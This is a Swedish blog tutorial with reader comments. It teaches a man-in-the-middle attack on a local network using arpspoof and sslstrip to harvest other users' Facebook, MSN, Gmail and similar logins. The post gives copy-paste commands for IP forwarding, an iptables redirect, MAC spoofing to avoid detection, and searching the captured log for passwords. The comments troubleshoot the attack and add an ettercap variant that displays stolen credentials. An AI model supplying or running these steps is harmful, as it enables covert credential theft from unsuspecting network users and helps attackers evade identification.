Vad går vi igenom idag? jo vi ska lära oss hur vi "sniffar"
alltså vi ska lära oss hur vi avlyssnar datortrafiken mellan olika datorer osv.
Men först och främst!!
Återigen så förväntar jag mig stöd ifrån er och hoppas ni kan göra det igen :) (läs dom 2 föregångna posterna om du inte vet vad jag menar) Tack på förhand alla!
Vi kommer gå igenom en enkel typ av sniffing attack, vi kommer använda oss av "arpspoof" och "sslstrip"
er på backtrack har det redan, er på ubuntu måste ni skaffa dom via apt-get install och sslstrip genoms deras hemsida ( se tidigare post )
Så vad vi kommer göra är att förgifta nätverket och göra så den skickar genom alla paket genom våran dator. Vi kommer snappa upp saker såsom Facebook konton msn konton osv, alltså i stort sätt alla som loggar in på något i nätverket kommer inte veta om att vi får deras information.
vi kommer skicka ett slags "gift" till routern så att vi kan få paketen.
Först och främst måste vi ändra 2 små saker.. så vi kan göra en "portforwarding"
kopiera och klistra in:
echo "1" > /proc/sys/net/ipv4/ip_forward
Kopiera och klistra in:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
Det här är ett måste om ni ska kunna lyckas : >
Och jag säger det igen att det inte är lagligt att göra det här på andras nätverk och jag kommer nu visa er ett sätt hur ni döljer eran Mac-adress så ni inte blir upptäckta, Ni får själv stå för om ni gör något ni inte får och jag ska inte stå för era dumma handlingar.
För att gömma eran mac-adress så skriver ni:
ifconfig wlan0 down
macchanger -s wlan0
macchanger -m 00:11:22:33:44:55 wlan0
ifconfig wlan0 up
Det ni nu gör är att ni fejkar eran nuvarande adress till "00:11:22:33:44:55", ni kan ändra den hu ni vill det spelar ingen roll.
sslstrip är ett utmärkt verktyg och läs gärna om det från deras hemsida så satt säga http://www.thoughtcrime.org/software/sslstrip/
Det är till för att fånga diverse http-trafik.
ni skriver nu i terminalen:
sslstrip -w randomname
"randomname är bara output namnet för själva filen vi kommer lagra alla lösenord osv i"
Öppna en ny terminal och skriv föjlande:
arpspoof -i wlan0 192.168.0.1 exempelvis
"(-i står för interface och ni ska nu välja erat interface)
(192.168.0.1 är bara ett exempel och det ska stå eran gateway adress där vilket du kan hitta om du skriver "route-n")
nu ska ni ha 2 fönster upp varav ett är sslstrip och andra arpspoof.
Ta en kopp kaffe eller gå"ut och gå och låt det här köras ett tag. minst 10minuter för det längre du väntar dess bättre saker kan du snappa upp :D
när ni nu vill avsluta era saker så kryssa ner allt bara och öppna eran fil där ni sparade era saker (min var tex randomname)
öppna den med ett vanligt textprogram såsom "kate")
tryck sedan F3 eller CTRL+F så ni kan söka i det här överdrift länga textdokument, sökordet ska/kan vara "pass" för då hittar ni oftast både lösenord och användarnamn, annars kan ni skriva "user".
Det borde vara allt! lämna en kommentar och stöd mig som jag sagt från tidigare inlägg :)
Ha en förjävla bra fredag!
MvH/
Ninja ;)
Nice!
SvaraRaderaEn fråga bara, hur bra fungerar macchanger? Jag menar OM jag skulle göra det på någon annans nätverk och OM dom sedan skulle märka att någon med MAC-adressen 00:11:22:33:44:55 var inne och rotade i deras nätverk. Hur lätt är det att få reda på min riktiga MAC? Det beror ju så klart på vem som ansvarar för nätverket, men är det lätt eller svårt att hitta den riktiga MAC adressen?
dom ser ju inte den "riktiga" adressen då du fejkat den. men dom lär märka att den är fejk om du har 00:11:22:33:44:55 och du bör göra den mer trolig alltså tex: 00:1F:54:G4:12:99 , det är bara ett förslag och du kan ju sätta din mac till vad som helst i stort sätt :)
SvaraRaderaoch dom hittar din mac adress med ett kommando om dom vill.
SvaraRaderaDet förstår jag, men hur mycket svårare gör macchanger det för dem att hitta min riktiga MAC genom den som är fake?
SvaraRaderaalltså dom ser inte din riktiga :P och dom kommer inte se den så länge du inte byter tillbaka eller startar om datorn eller om macchanger slår av
SvaraRaderaGött!
SvaraRaderaEn sak fattar jag inte dock:
"så vi kan göra en "portforwarding"
kopiera och klistra in:
echo "1" > /proc/sys/net/ipv4/ip_forward
Kopiera och klistra in:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
"
Varför just en 1 ?
Gör dessa två kommandon så att all trafik på port 80 dirigeras om till port 10000?
Allt verkar gå perfekt tills jag sedan stänger av terminalerna och öppnar filen jag skapat med kate, det är helt tomt i den, ingen text alls. Vad kan vara fel? :)
SvaraRaderaLukas, Jag har samma problem. Tror dock det beror på att ingen använder nätverket för tillfället och därför har vi inget att sniffa, amirite?
SvaraRadera@SpikeeeN & Lukas.
SvaraRaderaDet är ju en fördel om någon använder nätverket och loggar in på t.ex Gmail ;)
Blir lite svårt att sniffa annars.
Annars kan det nog bero på att ni har gjort fel på något steg, t.ex inte port forwardat ordentligt...?
Skriv sslstrip --help osv, --help är väldigt bra därför att du ser exakt vilka kommandon som gör vad.
Om ni har två datorer, använd ena för att prova at sniffa medan ni på den andra datorn loggar in på facebook, paypal, gmail eller liknande.
/Toad
14:e2:18:6e:5c:9c ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.1.1 is-at 14:e2:18:6e:5c:9c
SvaraRaderaBlir jag spammad från arpspoof.
och inget speciellt händer i sslstrip. Även fast jag kör -a t.o.m.
@Toad okej får läsa på lite mer och testa igen :)
SvaraRaderaSjälvklart så testar jag att logga in med en annan dator i nätverket :p
@SpikeeeN och Lukas. Det finns ett annat sätt. skriv nano /etc/etter.conf (nano gör så att du kan ändra i en fil).
SvaraRaderaI början där ska det stå något i stil med:
etc_uid=65000
etc_guid=65000
Behöver inte vara just det värdet (siffrorna) Men ni ska ändra till:
etc_uid=0
etc_guid=0
Hur som helst, när ni ändrat det trycker ni Ctrl + X , sedan y och enter. För att spara och exita.
Sedan kan ni istället för sslstrip -w skriva sslstrip -a -k -f
sedan i ett annat fönster:
ettercap -T -q -i wlan0 (wlan0 är ett exempel på ett interface).
Ni ska också skriva in det där med iptables som finns i guiden som ninjafisk skrivit.
Nu borde ni ha 3 fönster öppna. En för arpspoof, en för ettercap och en för sslstrip.
Om jag har gett er rätt kommandon och så borde det poppa upp username, password och vilken hemsida så fort någon loggar in på t.ex Gmail. (detta alltså stå i ettercap fönstret).
Hoppas det funkar, jag har inte min BT-dator framför mig då jag sitter på min mors dator med värdelöst mobilt bredband. Därför så KANSKE jag har skrivit något fel, men jag är rätt säker på att det borde funka.
Lycka till!
/Toad
Skön blogg!
SvaraRaderaSom Toad skrev så är det bara att öppna en till terminal och skriva in "ettercap -T -q -i wlan0" (förutsatt att allting fungerar korrekt)
Felsökning kan göras genom att skriva in den port do har portforwordat med "iptables" kommandot. Alltså det ninjafisk skrev var "10000" så skriver du in det i SSLstrip kommandot.
dvs
"sslstrip -a -k -f (-l 10000)" ta bort ().
Det finns en film om just detta för backtrack användare.
här
http://g0tmi1k.blip.tv/file/2345515
-sharing is caring-
Skön blogg keep it up.
-dfz